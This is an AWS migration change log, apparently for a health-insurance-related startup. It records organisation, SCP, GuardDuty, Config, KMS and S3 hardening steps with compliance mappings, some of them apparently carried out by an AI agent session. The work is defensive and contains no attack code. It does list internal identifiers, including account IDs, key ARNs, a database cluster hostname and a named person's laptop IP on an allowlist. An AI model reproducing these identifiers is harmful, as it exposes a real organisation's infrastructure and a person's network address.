- 1 TXT for DMARC
After records propagate (~5-30 min), ACM transitions to ISSUED and SES to verified; Phase 5 can attach the cert to the ALB and start sending via SES.
Pending follow-up
- Phase 5 ECS task role grants
secretsmanager:GetSecretValueon the 13 secret ARNs andkms:Decrypton the CMK for encrypted secret reads. - Phase 5 task role also grants
ses:SendEmail/ses:SendRawEmailonce SES identity is verified. - Phase 7 Atlas VPC peering updates the staging Atlas project with this VPC CIDR (
10.40.0.0/16), removes Taha's laptop IP from the allowlist.
Cost estimate (pre-workload)
- NAT Gateway: ~$33/mo
- Interface endpoints (3 × single-AZ): ~$21/mo
- CMK: $1/mo
- Secrets Manager: ~$5/mo (13 secrets × $0.40)
- ACM + SES identity: $0 (free tier)
- Flow Logs (CloudWatch Logs 7d): ~$1/mo at idle
- Total pre-workload: ~$61/mo
Will grow once ECS + ALB land in Phase 5.
2026-04-21T03:00Z — Phase 2.5: close chrome-agent Phase 2 verification gaps
Actor: taha.abbasi via SSO AdministratorAccess (mgmt + log-archive delegated admin) Linked: Issue #47, plan file ~/.claude/plans/hey-so-okay-that-delightful-eich.md (Phase 2.5 section)
Why
Chrome agent Phase 2 console verification was green on 5 of 6 checks but surfaced two specific fixable gaps + one not-yet-unblocked Taha action:
- GuardDuty feature plans (S3 data events, EBS malware, Runtime monitoring) showed "Do not auto-enable" on existing detectors. Root cause: my Phase 2
update-organization-configurationcall usedAutoEnable=NEWwhich only applies to future member accounts added to the org after the call — it does NOT retroactively push features to existing member detectors. - GuardDuty console banner in log-archive: delegated admin lacks Organizations trusted access for Malware Protection. Blocks any cross-account feature push involving EBS malware.
- Budgets UI blocked for AdministratorAccess SSO on mgmt (Taha-only root-toggle follow-up — deferred, tracked below).
What shipped (2.5.2 — GuardDuty features retroactively enabled on all 4 detectors)
- Enabled Organizations trusted access for
malware-protection.guardduty.amazonaws.comfrom mgmt account. This was the prerequisite that unlocked the member-detector update path. - From log-archive (delegated admin), ran
aws guardduty update-member-detectorsagainst 778477254880 + 039624954211 + 549136075525 with features:S3_DATA_EVENTS = ENABLEDEBS_MALWARE_PROTECTION = ENABLEDRUNTIME_MONITORING = ENABLEDwithECS_FARGATE_AGENT_MANAGEMENT = ENABLED
- Log-archive's own detector already had these enabled from Phase 2 direct
update-detectorcalls. - Verified via
get-detectoron each of 4 detector IDs:- mgmt
9a71698300b24e55a21a53c4d8f660a9 - prod
92cecfac97e0e00d20f77b575e742163 - staging
b6cecfac97da41f247f4f0e5de0e1b99 - log-archive
44396c0b61674ade87312ff13ab85996
- mgmt
What shipped (2.5.3 — Malware Protection for S3)
- New custom IAM role
GuardDutyMalwareProtectionS3Rolein mgmt (arn ending...KMPVPMJZJ) with trustmalware-protection-plan.guardduty.amazonaws.com+aws:SourceAccount == 778477254880. Scan permissions scoped strictly to theagent-survey-uploads/prefix. Alsokms:GenerateDataKey/Decrypt/DescribeKeyonalias/askflorence-dataso SSE-KMS objects can be scanned. - Malware Protection plan
d4ced6e0c14fe707c26dcreated onaskflorence-databucket, prefixagent-survey-uploads/, Tagging action ENABLED. Status: ACTIVE. - End-to-end smoke test: uploaded a 295-byte blank PDF via
/api/agents/discovery/upload, polleds3api get-object-tagging, scan tagGuardDutyMalwareScanStatus=NO_THREATS_FOUNDapplied within ~60 seconds. Test object cleaned up.
Intentional scope exclusions (documented for audit trail)
- Cross-account EBS Malware Protection grant (separate from the
EBS_MALWARE_PROTECTIONfeature above). Skipped because we're Fargate-only with zero EBS volumes to scan. Deliberate scope limit, documented in guardduty-setup.md. - EKS / RDS / Lambda / EC2-agent features in GuardDuty. Services we don't run.
- Security Hub Central configuration migration (noted by chrome agent). Deferred to Phase 3 or Phase 12 — cleaner to migrate once Terraform is managing Security Hub.
Deferred to Taha (2.5.1)
- Enable IAM user/role access to billing information on mgmt account root. Requires root login (can't be done from SSO). Navigate to console top-right account menu → Account → "IAM User and Role Access to Billing Information" → Edit → Activate. Doesn't change any permissions; just lets existing policies take effect on the Billing Console.
- After toggle: verify
aws --profile askflorence budgets describe-budgets --account-id 778477254880returns 5 budgets (was blocked at the IAM-billing-access layer before).
Compliance implications
- SOC 2 CC7.2 (Change Detection) + CC7.3 (Anomaly Detection): every account now has S3 data event detection, Fargate runtime monitoring, and EBS malware detection where applicable. Coverage is consistent across the org.
- HIPAA §164.308(a)(1)(ii)(D) (Information System Activity Review): agent PDF uploads are scanned pre-persistence tag; malware findings route to GuardDuty console (and eventually EventBridge in Phase 11).
- CMS EDE Phase 3: Malware Protection for S3 is defense-in-depth on the PHI-capable bucket. The intentional scope limits (no EKS/RDS/EC2 features) are documented so auditors see deliberate decisions, not gaps.
Pending follow-up
- Taha flips the billing access toggle (2.5.1) whenever convenient — no urgency.
- Phase 3 Terraform will
tf-importthe new IAM roleGuardDutyMalwareProtectionS3Role, Malware Protection plan, and the retroactive detector feature state so everything becomes IaC. - Phase 11: EventBridge rule to forward
GuardDutyMalwareScanStatus=THREATS_FOUNDtags to alerting.
2026-04-21T02:00Z — askflorence-data bucket hardened per agent-survey-uploads runbook
Actor: taha.abbasi via SSO AdministratorAccess in management account 778477254880 Linked: Issue #47, Issue #56, commit 07fd8aa, docs/runbooks/s3-agent-survey-uploads.md
Why
Commit 07fd8aa shipped /api/agents/discovery/upload which writes blank-template PDFs (potentially PHI-adjacent per the runbook's PHI-confirmation gate) into s3://askflorence-data/agent-survey-uploads/. The bucket was only partially hardened at that commit — public access blocked and SSE-S3 encryption only, no versioning, no deny-non-SSL policy, no lifecycle rules, no customer-managed CMK. Closing that gap now as an AWS migration intake task before Phase 3 Terraform scaffolding (otherwise we'd be importing an unhardened bucket into IaC).
What changed
KMS CMK created in management account (778477254880):
- Alias:
alias/askflorence-data - ARN:
arn:aws:kms:us-east-1:778477254880:key/88df2ce4-b694-4181-91b1-d0efc107429a - Key policy: mgmt root IAM +
s3.amazonaws.comservice-principal GenerateDataKey/Decrypt/DescribeKey - Annual auto-rotation enabled
- Tags:
Env=management,Owner=askflorence,ManagedBy=cli-phase2,DataClass=pii-phi
Bucket askflorence-data:
- Versioning: Enabled (was: off)
- Default encryption: SSE-KMS with
alias/askflorence-data, BucketKeyEnabled=true (was: SSE-S3 AES256) - Bucket policy added:
DenyNonSSLRequests(denies all S3 actions ifaws:SecureTransport == false) - Lifecycle rules added:
AgentSurveyUploadsLifecycle(prefixagent-survey-uploads/): abort incomplete multipart uploads after 1 day, transition to Glacier Instant Retrieval after 180 days, expire non-current versions after 90 days.AbortStalledMultipartUploadsGlobal(no prefix): abort incomplete multipart uploads after 7 days.
- Tags added: same as CMK
- Object Lock: intentionally not enabled. Compliance-mode Object Lock can't retrofit a bucket that wasn't created with it; per the runbook, this is deferred to Phase 4-5 where a new bucket with Object Lock enabled-at-creation will be stood up and data migrated. Tracked as a follow-up on #47.
IAM user vercel-agent-survey-uploader (created by Taha 2026-04-20 to back the upload route):
- Inline policy
PutAgentSurveyUploadsextended with:kms:GenerateDataKey,kms:Encrypt,kms:DescribeKeyon the new CMK ARN (required now that bucket default is SSE-KMS).
- Existing
s3:PutObjectonaskflorence-data/agent-survey-uploads/*unchanged.
Vercel env (production + preview):
- Added
S3_AGENT_SURVEY_KMS_KEY_ID= the new CMK ARN. Upload route in src/app/api/agents/discovery/upload/route.ts picks this up at line 119 and emits explicitServerSideEncryption: aws:kms+SSEKMSKeyId: <arn>on each PutObject. Without this env var the route would fall back to SSE-S3 AES256 (which still works because we have no bucket policy forcing aws:kms, but loses the CMK audit trail). - Vercel redeploy (
vercel --prod) required to pick up the env change.
Compliance implications
- HIPAA §164.312(a)(2)(iv) (encryption at rest): upgraded from SSE-S3 (AWS-managed) to SSE-KMS with customer-managed CMK. Audit trail for encryption operations now lands in CloudTrail via KMS data events (if enabled on the CMK — currently not; flag for Phase 4 to enable KMS data events on this key).
- HIPAA §164.312(e)(2)(ii) (encryption in transit): deny-non-SSL bucket policy enforces TLS for all access.
- SOC 2 CC6.7 (transmission restrictions): same.
- Data retention: lifecycle rules document retention intent (180d hot, Glacier IR after that, non-current expires at 90d). Partial PHI deletion procedure already documented in runbook.
- PHI-capable bucket in management account, not in a dedicated HIPAA-scoped account. Architectural debt noted: Phase 4 moves PHI-capable buckets into the prod member account (039624954211) where CloudTrail + Config + GuardDuty already scope per-account and SCPs tighten the blast radius.
Also followed
- Runbook docs/runbooks/s3-agent-survey-uploads.md step 3 updated with the real CMK ARN (was
<CMK-ID>placeholder).
Pending follow-up
vercel --prodredeploy so the app picks upS3_AGENT_SURVEY_KMS_KEY_ID. Taha's call when to trigger; no urgency since SSE-S3 fallback still works.- Phase 4-5: decision + execution on migrating to an Object Lock-enabled replacement bucket.
- Phase 4: enable KMS data events on this CMK in CloudTrail (per-CMK granular audit trail).
2026-04-18T01:00Z — Phase 2 complete: org-wide observability baseline
Actor: taha.abbasi via SSO AdministratorAccess (mgmt + each member as delegated admin) Linked: Issue #47
What shipped
2a — Log-archive foundations (all in 754660694122):
- KMS CMK
alias/askflorence-org-logs(arn:aws:kms:us-east-1:754660694122:key/e9dfcdbe-19e1-491c-a8f9-d17612cf6353) with annual auto-rotation, policy allowing CloudTrail + Config service encrypt and org-wide decrypt. - S3 bucket
askflorence-org-cloudtrail-logs-754660694122— object-lock COMPLIANCE 7yr, versioning, SSE-KMS, public access blocked, deny-non-SSL, CloudTrail write + deny-unencrypted-puts. - S3 bucket
askflorence-org-config-754660694122— SSE-KMS, versioning, public access blocked, deny-non-SSL, org-wide Config write.
2b — Trusted access + delegations + org trail:
- Enabled trusted access for 9 services (cloudtrail, config, config-multiaccountsetup, guardduty, securityhub, access-analyzer, stacksets, ram, ssm).
- Delegated admin to log-archive (754660694122) for: guardduty, securityhub, config, config-multiaccountsetup, access-analyzer.
askflorence-org-trailin mgmt — multi-region, org-wide, global events on, log file validation, SSE-KMS, CloudWatch Logs export (365d), Insights (ApiCallRate + ApiErrorRate).
2c — GuardDuty + Security Hub + Config:
- GuardDuty: org-wide auto-enroll ALL. Delegated admin detector
44396c0b61674ade87312ff13ab85996in log-archive + self-managed detector9a71698300b24e55a21a53c4d8f660a9in mgmt. Features: S3 data events, EBS malware protection, Runtime monitoring (ECS Fargate). - Security Hub: delegated admin = log-archive. Finding aggregator ALL_REGIONS→us-east-1. Standards: FSBP + CIS 1.2 (default) everywhere; CIS v3.0.0 on prod + staging; NIST 800-53 Rev 5 on prod (HIPAA-aligned).
- Config: recorder + delivery channel in all 4 accounts, customer-managed
AskFlorenceConfigRoleper account, snapshots toaskflorence-org-config-754660694122. Org-wide aggregatoraskflorence-org-aggregatorin log-archive.
2d — Drata autopilot role stubs:
DrataAutopilotRolecreated in all 4 accounts. Policies pre-attached (SecurityAudit + ReadOnlyAccess + DrataAutopilotExtras inline). Trust policy is a placeholder pointing to mgmt root with ExternalIdPLACEHOLDER-REPLACE-ON-DRATA-ONBOARD. When Drata is activated (Phase 12 / later), swap trust policy to Drata's official autopilot account ARN + their issued ExternalId — no further policy work needed.
2e — Documentation landed:
- NEW: cloudtrail-setup.md
- NEW: guardduty-setup.md
- NEW: security-hub-setup.md
- NEW: config-setup.md
Verification
aws cloudtrail get-trail-status --name askflorence-org-trail→ IsLogging true.aws guardduty describe-organization-configuration --detector-id 44396c0b61674ade87312ff13ab85996→ AutoEnableOrganizationMembers = ALL.aws securityhub describe-organization-configuration→ AutoEnable true, AutoEnableStandards DEFAULT.aws configservice describe-configuration-recorder-status(each account) → recording=true.aws configservice describe-configuration-aggregators(log-archive) →askflorence-org-aggregatorpresent.
SOC 2 / HIPAA / EDE relevance
- SOC 2 CC7.1 (Infrastructure Management) + CC7.2 (Change Detection): CloudTrail org trail, Config recorders, GuardDuty on day one — this is the continuous-operating-evidence auditors look for.
- HIPAA §164.308(a)(1)(ii)(D) (Information System Activity Review): CloudTrail + GuardDuty satisfy the audit-trail requirement for systems handling PHI (once PHI workloads land in Phase 5+).
- CMS EDE Phase 3: auditors will ask for 6-12 months of audit trail and threat detection history. Clock starts now.
- Drata readiness: read-only role stubs in all 4 accounts means Drata onboarding later is a trust-policy swap, not a fresh IAM setup.
Pending follow-up
- Expected: Security Hub controls will transition from PENDING to PASSED/FAILED over ~30-60 min. Review initial findings, document any expected failures (resources that don't exist yet pre-Phase 4).
- Future (Phase 8): apply HIPAA conformance pack to prod Config from log-archive delegated admin.
- Future (Phase 11): EventBridge rule to forward CRITICAL findings to alerting destination.
2026-04-18T00:45Z — Root MFA registered on all 3 new member accounts
Actor: taha.abbasi via root user of each member account Linked: Issue #47
What shipped
Root user on each of the 3 new member accounts now has:
- Password set via the AWS sign-in forgot-password flow (email delivered to
[email protected]via plus-addressing). - Virtual MFA device registered (see
iam:mfa/*ARN on each account's Security Credentials page). - Root session signed out after MFA setup.
| Account | Account ID | Root email | MFA |
|---|---|---|---|
| askflorence-prod | 039624954211 | [email protected] | Virtual, registered 2026-04-18 |
| askflorence-staging | 549136075525 | [email protected] | Virtual, registered 2026-04-18 |
| askflorence-log-archive | 754660694122 | [email protected] | Virtual, registered 2026-04-18 |
SOC 2 / HIPAA / EDE relevance
- SOC 2 CC6.1 (Logical Access) and CC6.2 (Credentials) — MFA required on privileged identities.
- HIPAA §164.312(d) (Person or Entity Authentication) — multi-factor present on all root users.
- Management-account root MFA already in place (pre-migration).
- Zero root access keys on any of the 3 new accounts (confirmed during bootstrap — Organizations-created accounts don't get them by default).
Day-to-day path is SSO AdministratorAccess / PowerUserAccess — root is sealed.
2026-04-18T00:30Z — SCP ScpBaseline v2: carve out root-bootstrap actions
Actor: taha.abbasi via SSO AdministratorAccess in management account 778477254880 Linked: Issue #47
Why
Phase 1 v1 of ScpBaseline (p-oy7xxdzz) had a blanket DenyRootUser rule that denied all actions when principal matched arn:aws:iam::*:root. This blocked root from performing the one-time bootstrap actions AWS requires for new member accounts (setting up MFA, changing password, listing access keys). Evidence: Taha saw Access denied to iam:ListMFADevices on root of 039624954211 with SCP p-oy7xxdzz cited in the error.
What changed
Replaced DenyRootUser with DenyRootExceptBootstrap — uses NotAction + Deny so root can only perform an allow-list of bootstrap actions, and is denied everything else. Allow-list:
iam:CreateVirtualMFADevice,DeleteVirtualMFADevice,EnableMFADevice,DeactivateMFADevice,ResyncMFADevice,ListMFADevices,ListVirtualMFADevices,GetMFADeviceiam:ChangePassword,UpdateLoginProfile,GetLoginProfileiam:GetAccountSummary,GetUser,ListAccessKeys,DeleteAccessKey,GetAccountPasswordPolicy,ListAccountAliasessts:GetCallerIdentity,GetSessionTokensignin:*,aws-portal:*,account:*,health:*,support:*,supportplans:*,trustedadvisor:*
All other root actions remain denied. The rest of the SCP (region-lock, deny-leave-org, protect-CloudTrail/Config/GuardDuty/SecurityHub) is unchanged.
Verification
aws organizations describe-policy --policy-id p-oy7xxdzzshows v2 content live.- Taha confirmed IAM Security Credentials page on 039624954211 now lists MFA devices after refresh.
Rollback
If a root action we didn't anticipate gets blocked, extend the allow-list (one PR) or temporarily detach the SCP (aws organizations detach-policy --policy-id p-oy7xxdzz --target-id <ou>) for the affected OU while debugging.
SOC 2 / HIPAA / EDE relevance
This tightens SOC 2 CC6.1 (Logical Access) — least-privilege enforcement on the highest-privilege identity (root). Aligns with AWS Well-Architected Security Pillar guidance "use root only for bootstrap tasks."
2026-04-18T00:25Z — AWS Organizations BAA accepted (org-wide)
Actor: taha.abbasi via root user of management account 778477254880, AWS Artifact → Organization agreements Linked: Issue #47, Issue #57
What shipped
- Accepted AWS Organizations Business Associate Addendum via AWS Artifact Organization agreements tab. Effective date: April 18, 2026. Status: Active.
- BAA applies to: management account (778477254880) plus all current + future member accounts in organization
o-vefew8kgv1. Coversaskflorence-prod(039624954211),askflorence-staging(549136075525), andaskflorence-log-archive(754660694122). - Signed PDF filed at: docs/infrastructure/evidence/aws-organizations-baa-signed-2026-04-18.pdf.
- Coverage scope per BAA text: PHI is permitted to be processed only on HIPAA-eligible AWS services, encrypted in-transit and at-rest, under AWS Customer Agreement terms.
Compliance implications
- SOC 2 CC1.4, HIPAA §164.314(a), CMS EDE Phase 3 — vendor-BAA evidence requirement for AWS satisfied at the infrastructure level.
- Cross-links #57 (vendor BAA audit) — AWS row can be marked complete with reference to this evidence.
- Remaining BAA work on #57 (owned by Asad): MongoDB Atlas, Resend, Cloudflare (DNS-only so not strictly required but good hygiene), PostHog, and future NIPR + ID-verification vendors.
2026-04-18T00:15Z — Mongo/Atlas parallel session handoff received
Actor: parallel Mongo/Atlas session agent Linked: Issue #56, session brief at SESSION_BRIEF_2026-04-17_atlas.md
The Mongo session provisioned the staging Atlas cluster per the handoff instructions in the AWS migration plan. Both hard corrections applied (separate Atlas project, no mirrored allowlist).
Facts the AWS session will consume at Phase 4 and Phase 7
- Atlas org ID:
69dc20c64005b222804daf75 - Staging Atlas project:
askflorence-staging→69e31af12fd2c0aef51bbb41(isolated from prod project69dc20c64005b222804dafa4) - Staging cluster:
askflorence-staging.efsikmv.mongodb.net— M0 free tier, us-east-1, MongoDB 8.0.21 - Seed: snapshot from prod
askflorence-prod-01, 35,056 docs, 231 MB (no PII/PHI) - Allowlist:
136.38.212.186/32(Taha's laptop) only. No0.0.0.0/0. - Users: 6 on staging (
app_read_staging,app_writer_survey,app_writer_plans,app_writer_agents,app_admin_agents,audit_reader). Connection strings in.env.staging.local(gitignored, mode 600). - Prod Atlas project untouched:
69dc20c64005b222804dafa4. Narrow-scoped users roll out to prod in a later session post-cutover.
AWS follow-ups from this handoff
- Phase 4: copy 6 staging Atlas URIs from
.env.staging.localinto AWS Secrets Manager understaging/mongodb/*in the staging account (549136075525). - Phase 7: create VPC peering from staging VPC (
10.40.0.0/16) to Atlas staging project69e31af12fd2c0aef51bbb41, then replace the laptop IP allowlist entry with the VPC CIDR. - Phase 8/11: same peering flow for the prod Atlas project
69dc20c64005b222804dafa4↔ AWS prod VPC (10.20.0.0/16).
2026-04-18T00:00Z — Phase 1 complete: AWS Organizations + accounts + SSO + SCPs + budgets
Actor: taha.abbasi via SSO AdministratorAccess in account 778477254880 Linked: Issue #47, migration plan at ~/.claude/plans/hey-so-okay-that-delightful-eich.mdSession: AWS migration agent (parallel to Mongo/Atlas session on #56)
Changes
OUs created under root
r-9qla:Prod—ou-9qla-8z7htmauNon-Prod—ou-9qla-o6snxwssSecurity—ou-9qla-c5psmqcy
Member accounts created (Organizations async):
askflorence-prod—039624954211—[email protected]→ Prod OUaskflorence-staging—549136075525—[email protected]→ Non-Prod OUaskflorence-log-archive—754660694122—[email protected]→ Security OU
IAM Identity Center permission sets created:
PowerUserAccess(PT4H) → managed policyPowerUserAccessBillingReadOnly(PT4H) → managed policyjob-function/BillingSecurityAudit(PT4H) → managed policiesSecurityAudit+ReadOnlyAccess- (existing)
AdministratorAccess(PT1H) untouched
SSO assignments: Taha assigned
AdministratorAccess+PowerUserAccesson each of the 3 new accounts.SCP
ScpBaselinecreated (p-oy7xxdzz) and attached to Prod, Non-Prod, Security OUs:- Deny root user actions on member accounts.
- Deny
organizations:LeaveOrganization. - Deny disabling CloudTrail / Config / GuardDuty / Security Hub.
- Region lock to
us-east-1(global services and service-linked roles exempted).
Budgets (all on management account 778477254880, filtered by LinkedAccount):
askflorence-prod-monthly: $200/moaskflorence-staging-monthly: $100/moaskflorence-log-archive-monthly: $50/moaskflorence-org-total-monthly: $500/mo- All with 80% actual + 100% forecast alerts to [email protected].
~/.aws/configon Taha's dev machine updated with profiles for each new account (AdminAccess + PowerUser on prod/staging, AdminAccess only on log-archive).
Verification
aws --profile askflorence-prod sts get-caller-identityreturns a validAWSReservedSSO_AdministratorAccess_*assumed-role in 039624954211 ✓- Same for
askflorence-staging(549136075525) andaskflorence-log-archive(754660694122) ✓ aws organizations list-accounts-for-parentshows each account in its correct OU ✓aws organizations list-policies-for-targetshowsScpBaselineattached to all 3 workload OUs ✓aws budgets describe-budgetsshows 5 budgets (4 new + 1 legacy) ✓
Rollback
All Phase 1 changes are fully reversible but account closure has a 90-day SUSPENDED waiting period at AWS's end. No reason to roll back — all changes are additive and do not affect the live Vercel site.
Pending follow-up
- AWS BAA signing in Artifact console (manual, must be done in-browser by Taha).
- Root credentials + MFA setup on all 3 member accounts (one-time, Taha only).
- Seal root credentials in password vault + hardware MFA in physical safe.